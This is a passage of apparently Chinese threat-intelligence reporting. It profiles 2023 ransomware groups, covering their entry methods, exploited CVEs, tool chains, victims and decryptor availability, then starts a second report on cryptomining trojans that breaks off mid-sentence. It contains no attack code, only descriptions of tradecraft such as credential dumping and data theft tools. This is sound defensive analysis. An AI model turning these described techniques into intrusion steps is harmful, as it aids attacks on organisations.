采用此类勒索攻击方式的威胁行为体会使用勒索软件执行体对数据文件进行加密,执行体通过特定加密算法(如AES、RSA、ChaCha20和Salsa20等)组合利用对文件进行加密,大多数被加密文件在未得到对应密钥的解密工具时,暂时无法解密,只有少部分受害文件因勒索软件执行体存在算法逻辑错误而得以解密。 窃取文件 采用此类勒索攻击方式的威胁行为体不使用勒索软件执行体对数据文件进行加密,仅在目标系统内驻留并窃取数据文件,窃密完成后通知受害者文件被窃取,如不按期支付勒索赎金,则会公开或出售窃取到的数据文件,给予受害者压力,从而迫使受害者尽早支付赎金。 窃取文件+加密文件 采用此类勒索攻击方式的威胁行为体发动勒索攻击前,会在目标系统内驻留一段时间,在此期间窃取数据文件,在窃取工作完成后会投放勒索软件执行体,加密系统中的文件,并通知受害者文件被窃取,如不按期支付勒索赎金,不仅现有网络环境中的文件因被加密而无法使用,而且还会公开或出售窃取到的数据文件,给予受害者压力,从而迫使受害者尽早支付赎金。 3.2023年活跃勒索攻击组织盘点 回顾2023年发生的勒索软件攻击事件,对活跃的勒索攻击组织进行盘点,包括组织基本信息、组织概览和相关案例,按组织名称首字母排序,排名不分先后。 3.1 8Base 8Base勒索软件被发现于2022年3月,勒索软件执行体是基于Phobos勒索软件的变种版本,其背后的攻击组织采用RaaS和双重勒索的模式运营,疑似为RansomHouse勒索攻击组织的分支或品牌重塑,通过RaaS和勒索赎金分成获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过漏洞武器化、有效访问凭证和搭载其他恶意软件等方式对目标系统突防,常利用SmokeLoader木马实现对目标系统的初始访问。目前暂未发现公开的解密工具。 在2023年中,其受害者信息发布及数据泄露平台留有已发布约200名受害者信息,实际受害者数量可能更多。 3.1.1 组织概览 组织名称 8Base 出现时间 2022年3月 典型突防方式 有效访问凭证、搭载其他恶意软件 典型加密后缀 .8base 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 金融业、制造业、服务业、医疗业、建筑业 常见国家/地区 美国、巴西、英国、加拿大、澳大利亚、德国、印度 3.1.2 相关案例 印度医疗行业Clear Medi公司被8Base勒索攻击组织列为受害者 7月3日,8Base勒索攻击组织将Clear Medi列为受害者,声称窃取与员工、患者、保险和财务等相关文件,现已公开。 美国丰田叉车经销商ToyotaLift Northeast公司被8Base勒索攻击组织列为受害者 8月23日,8Base勒索攻击组织将ToyotaLift Northeast列为受害者,声称窃取与通信、客户、财务和涉密等相关文件,现已公开。 3.2 Akira Akirasup[1]勒索软件被发现于2023年3月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,以RaaS模式经营和勒索赎金分成等方式实现获利,勒索赎金分别为用于解密被加密文件和删除被窃取的数据两部分,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过有效访问凭证、未配置多重身份验证(MFA)的VPN账户和漏洞武器化等方式对目标系统突防,曾利用思科VPN相关漏洞CVE-2023-20269实现对目标系统的初始访问。在建立与目标系统初始访问后,利用多种第三方工具作为攻击装备以实现其他恶意行为,例如使用AnyDesk远程控制计算机和传输文件,使用PowerTool关闭与杀毒软件有关的进程,使用PCHunter、Masscan和AdFind获取特定信息,使用Mimikatz窃取凭证,使用Rclone和FileZilla窃取数据等行为。 Akira勒索软件具备针对Windows、Linux和VMware等目标系统的执行体。除了“窃密+加密”的行为,还存在只窃密不加密的模式,在完成对受害系统数据窃取后,威胁行为体选择不投放勒索软件执行体,而是通过窃取到的数据威胁受害者进行勒索。国外安全厂商Avast发现Akira勒索软件存在漏洞[2],并于6月29日发布了解密工具,但该工具只适用于6月29日前的Akira勒索软件执行体版本,因为Akira勒索软件开发人员在此后修复了漏洞。 Akira勒索攻击组织与之前退出勒索软件市场的Conti勒索攻击组织疑似存在关联,体现在勒索软件执行体的部分代码段和加密数字货币钱包地址等方面。2023年中,其受害者信息发布及数据泄露平台留有已发布约142名受害者信息和窃取到的数据,实际受害者数量可能更多。 3.2.1 组织概览 组织名称 Akira 出现时间 2023年3月 典型突防方式 有效访问凭证、未配置多重身份验证的账户、漏洞武器化 典型加密后缀 .akira 解密工具 部分版本存在公开解密工具(6月29日前被加密文件存在解密可能) 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务、基于两部分勒索赎金(解密文件和删除被窃数据)和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 服务业、教育业、制造业、金融业、医疗业、公共管理 常见国家/地区 美国、法国、英国、加拿大、澳大利亚、荷兰 3.2.2 相关案例 Akira勒索攻击组织针对未配置多重身份验证的思科VPN用户发动攻击 8月24日,思科发布公告[3]指出Akira勒索攻击组织针对未配置多重身份验证的思科VPN用户发动攻击。在针对VPN的攻击活动中,威胁行为体首先是利用暴露的服务或应用程序,针对VPN账号未配置多重身份验证和VPN软件中的存在漏洞的用户发动攻击。一旦威胁行为体明确了目标网络的基本情况,将尝试通过LSASS(本地安全认证子系统服务)的转储来提取凭据,以便在目标网络环境中进一步移动和提权。 荷兰库拉索岛政府所有供水供电公司Aqualectra被Akira勒索攻击组织列为受害者 12月6日,Akira勒索攻击组织将荷兰库拉索岛政府所有供水供电公司Aqualectra列为受害者,威胁行为体声称即将公开从该公司窃取到的运营文件、业务文件和大量付款信息等,预计对80000个家庭和公司的隐私造成影响。 3.3 BianLian BianLian勒索软件被发现于2022年6月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,以RaaS模式经营和勒索赎金分成等方式实现获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过有效访问凭证和漏洞武器化等方式对目标系统突防,曾利用SonicWall VPN设备和Microsoft Exchange软件的CVE-2021-31207、CVE-2021-34473、CVE-2021-34523漏洞实现对目标系统的初始访问。威胁行为体利用突防手段实现对目标系统的初始访问后,投放一个Go语言编译的后门木马,安装远程控制的第三方工具用于实现后续恶意行为,例如TeamViewer、SplashTop和AnyDesk等。2023年1月,国外安全厂商Avast发布用于BianLian勒索软件的解密工具[4],随后,BianLian勒索攻击组织转变策略,放弃加密执行体,只通过窃取数据文件实现勒索攻击。 当前,其受害者信息发布及数据泄露平台留有已发布的223名受害者信息和窃取到的数据,2023年中留有143名受害者信息,实际受害者数量可能更多。 3.3.1 组织概览 组织名称 BianLian 出现时间 2022年6月 典型突防方式 有效访问凭证、漏洞武器化 典型加密后缀 .bianlian 解密工具 2023年1月前被加密文件可解密,后续转为只窃密不加密 加密目标系统 Windows 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 医疗业、金融业、制造业、教育业、服务业、公共管理 常见国家/地区 美国、澳大利亚、英国、加拿大、印度尼西亚 3.3.2 相关案例 美国韦恩斯伯勒市被BianLian勒索攻击组织列为受害者 3月,BianLian勒索攻击组织将美国韦恩斯伯勒市列为受害者,威胁行为体声称窃取约350 GB数据,包括警察局内部文件、个人及员工信息和商业等相关文件,现已公开。 印度尼西亚电信运营商Smartfren Telecom被BianLian勒索攻击组织列为受害者 9月,BianLian勒索攻击组织将印度尼西亚电信运营商Smartfren Telecom列为受害者,威胁行为体声称窃取约1.2 TB数据,包括个人数据、财务金融、业务运营、邮件及保密等相关文件,现已公开。 加拿大航空公司Air Canada被BianLian勒索攻击组织列为受害者 10月,BianLian勒索攻击组织将加拿大航空公司Air Canada列为受害者,威胁行为体声称窃取约210 GB数据,包括2008年至2023年间的技术和运营数据、SQL数据库备份数据和员工个人信息等相关文件,现已公开。 3.4 Black Basta Black Basta勒索软件被发现于2022年4月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,由于Black Basta所使用的每个勒索软件执行体都硬编码一个唯一的识别码,故猜测该组织仅采用定向模式开展勒索攻击活动。该勒索攻击组织主要通过有效访问凭证、搭载其他恶意软件和漏洞武器化等方式对目标系统突防。该组织成员在地下论坛发帖寻求组织机构的网络访问凭证,曾利用QBot木马和PrintNightmare相关漏洞CVE-2021-34527实现对目标系统的初始访问。在建立与目标系统初始访问后,利用多种第三方工具作为攻击装备以实现其他恶意行为,例如使用AnyConnect和TeamViewer建立远程链接,使用PsExec执行命令,使用Netcat进行扫描,使用Mimikatz转储凭证,使用Rclone窃取数据等恶意行为。2023年12月,国外网络安全研究机构Security Research发布一个名为“Black Basta Buster”的解密工具[5],用于恢复被Black Basta勒索软件加密的文件,但该工具仅适用于2022年11月至2023年12月期间的部分勒索软件变种版本。 Black Basta勒索攻击组织与之前退出勒索软件市场的BlackMatter和Conti勒索攻击组织疑似存在关联,体现在勒索软件执行体部分代码段,受害者信息发布及数据泄露站点设计风格,通信方式和勒索谈判话术等方面。故猜测Black Basta勒索攻击组织可能是BlackMatter和Conti勒索软件组织的分支或品牌重塑。在2023年中,其受害者信息发布及数据泄露平台留有已发布的约150名受害者信息,实际受害者数量可能更多。 3.4.1 组织概览 组织名称 Black Basta 出现时间 2022年4月 典型突防方式 有效访问凭证、搭载其他恶意软件漏洞武器化 典型加密后缀 .basta 解密工具 2022年11月至2023年12月期间部分变种版本存在解密可能 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 制造业、医疗业、建筑业、服务业、金融业、公共管理 常见国家/地区 美国、加拿大、英国、澳大利亚、新西兰、德国 3.4.2 相关案例 美国维京可口可乐瓶装公司被Black Basta勒索攻击组织列为受害者 5月,Black Basta勒索攻击组织将美国维京可口可乐瓶装公司列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工信息表、身份证、护照申请记录、保密协议和付款记录等文件,现已公开。 德国国防工业Rheinmetall集团被Black Basta勒索攻击组织列为受害者 5月,Black Basta勒索攻击组织将德国国防工业Rheinmetall集团列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工个人信息、保密协议、授权书、设计图纸和采购合同等文件,现已公开。 电子和电气连接线生产厂商Volex被Black Basta勒索攻击组织列为受害者 10月,Black Basta勒索攻击组织将总部位于英国的电子和电气连接线生产厂商Volex列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工身份证、就诊记录、录用通知书、保密协议和产品图纸等文件,现已公开。 3.5 BlackCat BlackCat(又称ALPHV或Noberus)勒索软件[6]被发现于2021年11月,其背后的攻击组织通过RaaS和多重勒索的模式运营该勒索软件,主要以RaaS模式经营和勒索赎金分成等方式实现获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该组织于2023年2月21日发布名为“Sphynx”的2.0版本。该勒索攻击组织主要通过漏洞武器化和有效的访问凭证等方式对目标系统突防。BlackCat勒索攻击组织采用多种手段迫使受害者支付赎金,包括向受害者主管单位举报、DDoS攻击和骚扰受害单位相关人员。2023年12月,美国联邦调查局与多方执法机构合作,成功查处BlackCat组织用于勒索攻击的基础设施,关闭发布受害者信息的网站,并提供解密受害者被加密文件的密钥,有望帮助500多名受害者恢复文件[7]。 BlackCat勒索软件与已经退出勒索软件市场的REvil、DarkSide和BlackMatter勒索软件存在关联,是第一个使用Rust编程语言开发跨平台攻击载荷的勒索软件,其载荷支持在Windows、Linux和VMware ESXi系统上执行。其受害者信息发布及数据泄露平台陆续发布受害者信息和窃取到的数据,在2023年内发布约410名受害者信息,实际受害者数量可能更多。 3.5.1 组织概览 组织名称 BlackCat(又称ALPHV或Noberus) 出现时间 2021年11月 典型突防方式 漏洞武器化、有效访问凭证 典型加密后缀 .(6-7位数字+字母组合随机) 解密工具 受害者需与FBI进行联系(查获500多名受害者密钥) 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务,基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据、DDoS干扰、骚扰涉事第三方 常见针对行业 制造业、服务业、教育业、医疗业、金融业、公共管理 常见国家/地区 美国、澳大利亚、印度、印度尼西亚、英国、墨西哥 3.5.2 相关案例 墨西哥饮料公司Coca-Cola FEMSA被BlackCat勒索攻击组织列为受害者 6月,BlackCat勒索攻击组织将墨西哥饮料公司Coca-Cola FEMSA列为受害者,威胁行为体公开展示窃取到的数据文件示例,示例图片内容为Coca-Cola FEMSA公司与合作公司的订单信息、交易合同和利润分成合同等文件,现已公开。 美国社交新闻网站Reddit被BlackCat勒索攻击组织列为受害者 6月,BlackCat勒索攻击组织将美国社交新闻网站Reddit列为受害者,威胁行为体声称于2月5日入侵到Reddit的系统中,事件起因是Reddit员工遭受具有针对性的网络钓鱼攻击,威胁行为体窃取了80 GB压缩后的数据。威胁行为体想要450万美元作为赎金,并且要求Reddit撤回关于API定价上调的决定。 美国美高梅国际酒店集团遭受BlackCat攻击 9月,BlackCat勒索攻击组织将美国美高梅国际酒店集团(MGM Resorts International)列为受害者,本次事件是位于拉斯维加斯的酒店和赌场运营设施遭受BlackCat勒索软件攻击,导致酒店住房系统和赌场娱乐设施系统无法运营,迫使客人等待数小时才能办理入住,电子支付、数字钥匙卡、老虎机、自动取款机和付费停车系统瘫痪。 3.6 Clop Clop(又称Cl0p)勒索软件被发现于2019年2月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,主要以RaaS模式经营和勒索赎金分成等方式实现获利。使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击,在部分攻击活动中只通过窃取数据文件实现勒索攻击。该勒索攻击组织主要通过有效访问凭证和漏洞武器化等方式对目标系统突防,曾利用Accellion(现名Kiteworks)公司文件传输设备(FTA),SolarWinds公司Serv-U托管文件传输(MFT),Fortra公司GoAnywhere MFT和Progress公司MOVEit MFT等产品的相关漏洞实现对目标系统的初始访问。在建立与目标系统初始访问后,利用多种第三方工具作为攻击装备以实现其他恶意行为。SentinelLabs发现Clop勒索软件的部分Linux变种版本可支持解密[8],因勒索软件执行体加密算法存在缺陷。其他变种版本暂未发现公开的解密工具。 在2023年中,其受害者信息发布及数据泄露平台留有已发布的约353名受害者信息,实际受害者数量可能更多。 3.6.1 组织概览 组织名称 Clop(又称Cl0p) 出现时间 2019年2月 典型突防方式 漏洞武器化、有效访问凭证 典型加密后缀 .clop 解密工具 部分Linux版本下的勒索软件执行体变种可解密 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据 常见针对行业 金融业、服务业、医疗业、教育业、公共管理 常见国家/地区 美国、加拿大、印度、英国、荷兰 3.6.2 相关案例 Clop勒索攻击组织利用MOVEit相关漏洞发动大规模勒索攻击 Clop勒索攻击组织利用MOVEit产品相关漏洞,对使用该产品的用户发动勒索攻击,威胁行为体在本次事件中,多采用只窃密不加密的策略,其声称受害者包括安永(EY)会计师事务所、德勤(DTT)会计师事务所、普华永道(PwC)会计师事务所、保险业怡安(Aon)集团,化妆品行业雅诗兰黛集团等,窃取到的数据已公开下载方式。 3.7 LockBit LockBit勒索软件[9]被发现于2019年9月,初期因其加密后的文件名后缀为.abcd,而被称为ABCD勒索软件;其背后的攻击组织通过RaaS和多重勒索的模式运营该勒索软件,主要通过RaaS和勒索赎金分成获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该组织在2021年6月发布了勒索软件2.0版本,增加了删除磁盘卷影和日志文件的功能,同时发布专属数据窃取工具StealBit,采用双重勒索策略;2021年8月,该组织的攻击基础设施频谱增加了对DDoS攻击的支持;2022年6月勒索软件更新至3.0版本,由于3.0版本的部分代码与BlackMatter勒索软件代码重叠,因此LockBit 3.0又被称为LockBit Black,这反映出不同勒索攻击组织间可能存在的人员流动、能力交换等情况。使用LockBit RaaS实施攻击的相关组织进行了大量攻击作业,通过有效访问凭证、漏洞武器化和搭载其他恶意软件等方式实现对目标系统的初始访问。LockBit勒索软件仅对被加密文件头部的前4K数据进行加密,因此加密速度明显快于全文件加密的其他勒索软件,由于在原文件对应扇区覆盖写入,受害者无法通过数据恢复的方式来还原未加密前的明文数据。目前暂未发现公开的解密工具。 2023年10月,波音公司被LockBit勒索攻击组织列为受害者,安天CERT从攻击过程还原、攻击工具清单梳理、勒索样本机理、攻击致效后的多方反应、损失评估、过程可视化复盘等方面开展了分析工作,并针对事件中暴露的防御侧问题、RaaS+定向勒索的模式进行了解析,并提出了防御和治理方面的建议[10]。在2023年中,其受害者信息发布及数据泄露平台发布约1030名受害者信息和窃取到的数据,实际受害者数量可能更多。 3.7.1 组织概览 组织名称 LockBit 出现时间 2019年9月 典型突防方式 有效访问凭证、漏洞武器化、搭载其他恶意软件 典型加密后缀 字母与数字随机组合的9位个人ID 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows、Linux、macOS、VMware ESXi 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开或贩卖数据、DDoS干扰 常见针对行业 金融业、服务业、建筑业、教育业、制造业 常见国家/地区 美国、英国、德国、加拿大、印度、日本 3.7.2 相关案例 英国皇家邮政被LockBit勒索攻击组织列为受害者 2月,LockBit勒索攻击组织将英国皇家邮政列为受害者,勒索攻击事件发生于1月,本次事件导致英国皇家邮政的国际出口服务受到干扰,暂时无法将物品运送到海外目的地。威胁行为体公开了与英国皇家邮政的谈判记录,并表明最后的赎金为4000万美元,用于恢复被加密文件及删除窃取到的数据,由于未能按时支付赎金,现已公开窃取到的约44.4 GiB数据,该组织在其数据泄露平台采用GiB数据计量单位,1 GiB约等于1.07 GB。 名古屋港口遭受LockBit勒索攻击组织攻击 7月,日本名古屋港口遭受LockBit勒索攻击组织攻击[11],本次事件对名古屋港统一终端系统造成影响,该系统是控制港口所有集装箱码头的中央系统,从而导致集装箱搬运工作无法进行、港口中五个码头停运近三天,影响大约2万个集装箱进出港和260家相关企业。丰田汽车主要通过该港口进行货物运输,在此期间部分装有进出口零件的集装箱无法装卸。 波音公司遭受LockBit勒索攻击组织攻击 10月,LockBit所属的受害者信息发布平台发消息声称窃取了波音公司的大量敏感数据,并以此胁迫波音公司,如果不在2023年11月2日前与LockBit组织取得联系,将会公开窃取到的敏感数据。此后可能因双方谈判失败,LockBit组织公开发布从波音公司窃取到的21.6 GiB数据。 3.8 Medusa Medusa勒索软件被发现于2021年6月,与2019年出现的MedusaLocker勒索软件无关,其背后的攻击组织采用RaaS和双重勒索的模式运营,主要通过RaaS和勒索赎金分成获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过漏洞武器化、有效访问凭证和远程桌面协议暴力破解等方式对目标系统突防。目前暂未发现公开的解密工具。 在2023年中,其受害者信息发布及数据泄露平台留有已发布的约140名受害者信息,实际受害者数量可能更多。 3.8.1 组织概览 组织名称 Medusa 出现时间 2021年6月 典型突防方式 漏洞武器化、有效访问凭证 典型加密后缀 .MEDUSA 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、DDoS干扰、公开和贩卖窃密数据 常见针对行业 制造业、教育业、服务业、金融业、建筑业、公共管理 常见国家/地区 美国、英国、加拿大、印度、土耳其、澳大利亚、汤加、意大利 3.8.2 相关案例 汤加电信公司被Medusa勒索攻击组织列为受害者 2月,Medusa勒索攻击组织将汤加电信公司列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工身份证、业务往来和保密协议等文件,现已公开。 意大利自来水供应商Alto Calore Servizi S.p.A被Medusa勒索攻击组织列为受害者 5月,Medusa勒索攻击组织将意大利自来水供应商Alto Calore Servizi S.p.A列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括人员信息、供水管线信息、施工图纸和施工计划等文件,现已公开。 丰田金融服务公司Toyota Financial被Medusa勒索攻击组织列为受害者 11月,Medusa勒索攻击组织将丰田金融服务公司Toyota Financial列为受害者,威胁行为体公开展示窃取到的数据文件示例,包括员工身份证、公司财务报表、车辆评估信息和商业合同等文件,现已公开。 3.9 Play Play(又称PlayCrypt)勒索软件[12]被发现于2022年6月,其背后的攻击组织通过双重勒索的模式运营该勒索软件,并声称不通过RaaS模式运营,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过有效访问凭证和漏洞武器化等方式对目标系统突防,曾利用ProxyNotShell、Microsoft Exchange Server和FortiOS相关漏洞实现对目标系统的初始访问。目前暂未发现公开的解密工具。 Play勒索攻击组织疑似与Conti、Royal、Hive和Nokoyawa勒索攻击组织存在关联,体现在用于攻击的基础设施和勒索攻击活动中所使用的技战术等方面。在2023年中,其受害者信息发布及数据泄露平台留有已发布的约213名受害者信息,实际受害者数量可能更多。 3.9.1 组织概览 组织名称 Play(又称PlayCrypt) 出现时间 2022年6月 典型突防方式 有效访问凭证、漏洞武器化 典型加密后缀 .play 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows 运营方式 自称不采用RaaS、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、DDoS干扰、公开和贩卖窃密数据 常见针对行业 电信业、医疗业、服务业、金融业、教育业、房地产业 常见国家/地区 德国、美国、英国、澳大利亚、葡萄牙、瑞士 3.9.2 相关案例 瑞士媒体公司CH Media被Play勒索攻击组织列为受害者 4月,Play勒索攻击组织将瑞士媒体公司CH Media列为受害者,威胁行为体声称窃取到500 GB数据文件,包括机密资料、项目工程、员工薪资和员工信息等文件,现已公开。 瑞士IT服务提供商Xplain被Play勒索攻击组织列为受害者 5月,Play勒索攻击组织将瑞士IT服务提供商Xplain列为受害者,威胁行为体声称窃取到907 GB数据文件。6月,瑞士警方针对该事件开始调查,因为该公司为多个联邦和州政府部门、军队、海关和警察局提供服务,多个单位间接受到此次事件的影响。 美国达拉斯市被Play勒索攻击组织列为受害者 10月,Play勒索攻击组织将美国达拉斯市列为受害者,威胁行为体声称窃取到400 GB数据文件,文件为该市的私人文件,现已公开。 3.10 Rhysida Rhysida勒索软件被发现于2023年5月,其背后的攻击组织通过RaaS和双重勒索的模式运营该勒索软件,以RaaS模式经营和勒索赎金分成等方式实现获利,使用该勒索软件的威胁行为体在非定向和定向模式下开展勒索攻击。该勒索攻击组织主要通过有效访问凭证和漏洞武器化等方式对目标系统突防,曾利用Microsoft Netlogon漏洞CVE-2020-1472实现对目标系统的初始访问。目前暂未发现公开的解密工具。 Rhysida勒索攻击组织与Vice Society勒索攻击组织存在关联,猜测Rhysida可能为Vice Society的分支或品牌重塑。在2023年中,其受害者信息发布及数据泄露平台留有已发布的约76名受害者信息,实际受害者数量可能更多。 3.10.1 组织概览 组织名称 Rhysida 出现时间 2023年5月 典型突防方式 有效访问凭证、漏洞武器化 典型加密后缀 .rhysida 解密工具 目前暂未发现公开的解密工具 加密目标系统 Windows、Linux、VMware ESXi 运营方式 勒索即服务、基于勒索赎金和贩卖数据 侵害模式 加密致瘫、窃密、公开和贩卖窃密数据 常见针对行业 制造业、医疗业、制造业、教育业、服务业、公共管理 常见国家/地区 美国、英国、印度尼西亚、德国、巴西、智利 3.10.2 相关案例 智利陆军Ejercito de Chile被Rhysida勒索攻击组织列为受害者 5月,Rhysida勒索攻击组织将智利陆军Ejercito de Chile列为受害者,智利陆军是智利武装部队中负责智利国土防卫的分支。威胁行为体声称窃取到220 GB数据文件,共26862个文件,并表明未出售的部分将被公开。 英国国家图书馆British Library被Rhysida勒索攻击组织列为受害者 11月,Rhysida勒索攻击组织将大英图书馆British Library列为受害者,威胁行为体声称窃取到573 GB数据文件,共490191个文件,要求受害者支付20 BTC作为勒索赎金。
standards
2023年活跃挖矿木马盘点 时间 : 2024年01月29日 来源: 安天CERT 1.概述 挖矿木马通过各种手段将挖矿程序植入受害者的计算机中,在用户不知情的情况下,利用受害者计算机的运算能力进行挖矿,从而获取非法收益。目前已知多个威胁组织(例如,H2Miner、“8220”等)传播挖矿木马,致使用户系统资源被恶意占用和消耗、硬件寿命被缩短,严重影响用户生产生活,妨害国民经济和社会发展。2023年,安天CERT发布了多篇针对挖矿木马的分析报告,现将2023年典型的挖矿木马梳理形成组织/家族概览,进行分享。 挖矿木马组织/家族 出现时间 针对平台 “8220”2017年 Windows、Linux Outlaw 2018年 Linux WatchDog 2019年1月 Windows、Linux TeamTNT 2019年10月 Linux H2Miner 2019年12月 Windows、Linux Sysry-hello 2020年12月 Windows、Linux libgcc_a/warmup 2021年8月 Windows、Linux Kthmimu 2022年3月 Windows、Linux aminer 2022年6月 Linux Diicot/color1337/Mexals 2022年10月 Linux 2.挖矿木马的危害 1. 加重信息系统基础设施资源消耗与运行风险:挖矿木马普遍消耗信息系统基础设施的大量资源,使操作系统及其服务、应用软件运行缓慢,甚至造成正常服务崩溃,产生承载业务中断、业务数据丢失等一系列负面影响; 2. 危害信息系统基础设施使用寿命与运行性能:挖矿木马迫使信息系统基础设施长时间高负载运行,致使其使用寿命缩短,运行性能严重下降; 3. 浪费能源,增大碳排放量:挖矿木马挖矿会消耗大量电能,造成巨大的能源消耗,而现阶段我国电能的主要来源是煤炭类化石燃料燃烧供电,因此,其挖矿作业加剧碳排放污染; 4. 留置后门,衍生僵尸网络:挖矿木马普遍具有添加SSH免密登录后门、安装RPC后门,接收远程IRC服务器指令、安装Rootkit后门等恶意行为,致使受害组织网络沦为僵尸网络; 5. 作为攻击跳板,攻击其他目标:挖矿木马支持攻击者控制受害者服务器进行DDoS攻击,以此服务器为跳板,攻击其他计算机,或者释放勒索软件索要赎金等。 3.3 挖矿木马趋势 3.1 AI时代驱动挖矿木马新浪潮 2023年,随着以ChatGPT为首的大模型人工智能技术的不断成熟和普及,利用大模型发起网络攻击使得网络安全变得更加严峻。特别是在挖矿木马领域,这种以非法利用计算资源进行加密货币挖矿的恶意软件,正在经历一场由AI技术驱动的变革。在这一背景下,部分主要依靠开源工具或脚本的攻击者开始崛起,他们利用人工智能为其编写和优化攻击脚本,使得挖矿木马攻击对网络环境构成严重的网络安全威胁。攻击者借助AI的强大能力,可以快速生成大量的变种恶意脚本,这些脚本往往作为挖矿木马的前导文件,用以准备环境、规避检测或执行实际的挖矿操作。AI的介入显著降低了编写高级恶意脚本的技术门槛,即使是技术能力相对较低的攻击者,也能够在网络空间制造出广泛的影响。 3.2 内核级工具使挖矿木马更加难以检测 在2023年的挖矿取证中,安天CERT发现挖矿木马攻击者正日益倾向于使用Rootkit内核级工具,如yayaya Miner、TeamTNT和“8220”等。这一趋势预示着未来这类工具的流行程度将进一步上升。Rootkit内核级工具之所以受到青睐,主要是因为它们能够在系统的最底层进行潜伏,从而提供更深层次的隐蔽性和控制力。这些工具能够直达操作系统的核心,加载恶意的内核模块,以实现避免被传统安全软件检测到的状态。它们可以有效地隐藏恶意进程和文件,由于这些工具对系统的高级控制,即便是系统重启,它们也能够持续在后台运行,确保持续的挖矿活动不受干扰。随着挖矿木马攻击者对利润的不断追求,结合Rootkit技术的挖矿木马将变得越来越复杂。它们不仅仅满足于利用受害者的计算资源,更可能进行更为深入的网络渗透,对网内其他终端造成潜在威胁。 3.3 SHC加密脚本促使挖矿木马更加隐蔽 2023年,安天CERT对监测到的挖矿木马进行了梳理,发现挖矿木马攻击者为了逃避安全检测,开始采用各种混淆和加密技术来隐藏其恶意代码。其中,使用Shell脚本编译器(SHC)对脚本进行加密的做法愈发流行,SHC成为了攻击者新的工具选择,以增强其挖矿脚本的隐蔽性。SHC是一种将Shell脚本加密成二进制可执行文件的工具,它可以有效地隐藏脚本的源代码,从而使得分析人员难以直接查看代码内容。这种加密不仅可以防止脚本源代码被分析,还可以绕过基于签名的检测机制,因为每次加密后生成的二进制文件都具有不同的签名。安天CERT在2023年先后分析了Hoze、yayaya Miner和Diicot等挖矿木马,均利用SHC加密的脚本发起初始攻击,这种攻击方式为挖矿木马的传播提供了便利,加剧了用户系统被感染的风险。 4.活跃挖矿木马介绍 4.1 “8220” “8220”是一个长期活跃并且擅长使用漏洞进行攻击并部署挖矿程序的组织,该组织早期使用Docker镜像传播挖矿木马,后来逐步利用多个漏洞进行攻击,如WebLogic漏洞、Redis未授权访问漏洞、Hadoop Yarn未授权访问漏洞和Apache Struts漏洞等。在2020年发现该组织开始使用SSH暴力破解进行横向攻击传播。自Apache Log4j 2远程代码执行漏洞曝光后,该组织利用该漏洞制作漏洞利用脚本进行传播,影响范围广。 4.1.1 组织概览 表4-1 “8220”挖矿组织介绍 组织名称:“8220” 出现时间:2017年 针对平台:Windows、Linux 传播方式:SSH暴力破解、Docker镜像和漏洞利用 利用的漏洞:Apache Log4j 2远程代码执行漏洞、Oracle WebLogic漏洞、Atlassian Confluence漏洞、Redis未授权访问漏洞、Hadoop Yarn未授权访问漏洞、Apache Struts漏洞 挖矿币种:门罗币(XMR) 4.1.2 典型案例 ● “8220”挖矿组织活动分析 2022年1月,安天CERT陆续捕获到多批次“8220”挖矿组织攻击样本,该挖矿组织自2017年出现,持续活跃,同时向Windows与Linux双平台传播恶意脚本,下载的载荷是门罗币挖矿程序以及其他僵尸网络程序、端口扫描暴力破解工具等[1]。 ● “8220”挖矿组织最新挖矿活动分析 在2023年1月到2月期间,研究人员观察到一个针对Oracle Weblogic Server的攻击负载。该负载提取了ScrubCrypt,通过对应用程序进行混淆和加密,使其能够规避安全程序。此外,已经有了更新版本,并且卖家网页上承诺可以绕过Windows Defender并提供反调试和一些绕过功能。通过分析被注入受害者系统中的恶意软件,研究人员确定了攻击者为“8220”挖矿组织,并详细阐述了ScrubCrypt和此加密器在过去传递的其他恶意软件的细节[2]。 ● 针对Oracle WebLogic漏洞的攻击活动分析 “8220”挖矿组织自2017年起一直活跃,并持续扫描云和容器环境的易受攻击应用程序。他们以部署加密货币挖矿程序为目的,攻击了Oracle WebLogic、Apache Log4j、Atlassian 